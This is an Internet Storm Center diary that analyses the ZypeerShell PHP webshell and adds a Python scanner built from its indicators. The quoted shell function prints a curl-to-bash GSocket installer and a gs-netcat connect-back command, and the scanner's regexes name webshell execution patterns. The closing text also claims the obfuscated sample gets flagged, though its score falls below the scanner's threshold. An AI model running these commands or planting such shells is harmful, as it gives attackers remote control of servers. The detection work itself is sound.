Webshells Remain Popular, (Mon, Jun 22nd)
SANS Internet Storm Center

Webshells Remain Popular

Webshells have been popular for a long time. We have already covered this topic across multiple diaries[1][2]. I spent some time tracking them[3] and have paid slightly less attention to them since, but today I found another one. It seems to be a new player (pushed to GitHub two months ago).

The webshell is called ZypeerShell[4] and pretends to be "The most powerful, undetectable, and feature-rich PHP webshell available on GitHub." The shell is classic and provides most of the expected features for such a tool:

  • File management
  • Command execution
  • Database interaction
  • Reverse shell capabilities

I won't review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. For example, the function zypeergsdeploy() is meant to connect the host back to a C2 server through GSocket:

function zypeergsdeploy() {
    zypeerhead();   // the shell's own page-header helper
    echo ' | GSocket Deploy Tool | ';
    echo ' ';
    echo 'This tool runs the official GSocket installation command: ';
    echo ' bash -c "$(curl -fsSL https://gsocket.io/y)" ';
    echo 'After installation, it will show a secret token and connection command (like gs-netcat -s "XXXX" -i). ';
    echo 'Click "Run" below to execute it directly.';
    echo ' ';
    // The "Run" button posts zypeer3 = '>>'; this branch handles every other request
    if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') {
        [...]   // body elided in the diary
    }
}

This function is never called! Note that the GitHub repository contains a version obfuscated with Fortress Layer, a multi-layer loader with integrity checks. Zypeer is also referenced as a red-team tool on a Telegram channel.
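The strings quoted above (the gsocket.io installer URL, the gs-netcat connection command, the zypeer* function names) are exactly the kind of static indicators a defender can sweep a web root for. The scanner below is an added example for this diary, not code from the ISC or from the ZypeerShell repository: it combines the page's own strings with generic PHP webshell heuristics (request input reaching an execution sink, eval of decoded blobs), scores each file, and returns the matches. The weights, the threshold and the three sample PHP snippets are constructed for illustration.

```python
"""Static indicator scan for PHP webshells (added example, not the diary's code).

Indicators marked "page" are strings taken from the diary's quoted
zypeergsdeploy() function; the rest are generic webshell heuristics.
Weights and the default threshold are assumptions chosen for this example.
"""
import re
from pathlib import Path

# (name, pattern, weight). Weights only rank hits; tune them locally.
INDICATORS = [
    # page: GSocket installer URL echoed by the deploy tool
    ("gsocket_installer", re.compile(r"gsocket\.io/y"), 5),
    # page: gs-netcat connection command shown after install
    ("gs_netcat", re.compile(r"gs-netcat\b"), 4),
    # page: the shell's functions all start with the zypeer prefix
    ("zypeer_function", re.compile(r"\bzypeer[a-z0-9_]*\s*\("), 5),
    # generic: request-controlled input passed straight to a command sink
    ("post_to_exec", re.compile(
        r"\b(?:shell_exec|system|exec|passthru|popen|proc_open)\s*\(\s*\$_(?:POST|GET|REQUEST)\b"), 4),
    # generic: eval() of request data
    ("eval_of_request", re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"), 4),
    # generic: eval() of a decoded/inflated blob (obfuscated loaders)
    ("base64_eval", re.compile(r"\beval\s*\(\s*(?:gz\w+|base64_decode|str_rot13)\s*\("), 3),
]


def scan_php_source(source: str) -> dict:
    """Return the indicator names that fire on one PHP source and their summed weight."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"hits": hits, "score": score}


def scan_webroot(root, threshold: int = 4) -> dict:
    """Walk a directory tree and report every .php file scoring at or above threshold."""
    results = {}
    for path in Path(root).rglob("*.php"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        result = scan_php_source(text)
        if result["score"] >= threshold:
            results[str(path)] = result
    return results


# Constructed samples (not files taken from the diary or the repository)
SAMPLE_DEPLOY = """<?php
function zypeergsdeploy() {
    echo 'bash -c "$(curl -fsSL https://gsocket.io/y)"';
    echo 'gs-netcat -s "XXXX" -i';
}
"""
SAMPLE_BENIGN = """<?php
$rows = $pdo->query('SELECT id FROM users')->fetchAll();
echo count($rows);
"""
SAMPLE_OBFUSCATED = """<?php eval(gzinflate(base64_decode('...'))); ?>"""

if __name__ == "__main__":
    for label, sample in [("deploy", SAMPLE_DEPLOY), ("benign", SAMPLE_BENIGN),
                          ("obfuscated", SAMPLE_OBFUSCATED)]:
        print(label, scan_php_source(sample))
```

Run it against a copied web root with scan_webroot("/path/to/webroot"); the obfuscated sample shows why the generic eval-of-decoded-blob rule matters, since a Fortress-Layer-style loader would not expose the zypeer* names or the GSocket strings in clear text, and only a low-weight hit remains to pull the file up for manual review.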

[1] https://isc.sans.edu/diary/Webshells+Webshells+everywhere/28106
[2] https://isc.sans.edu/diary/Webshell+looking+for+interesting+files/23567
[3] https://owasp.org/www-chapter-belgium/assets/2017/2017-05-29/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf
[4] https://github.com/sagsooz/ZypeerShell

Xavier Mertens (@xme)
Xameco Senior ISC Handler - Freelance Cyber Security Consultant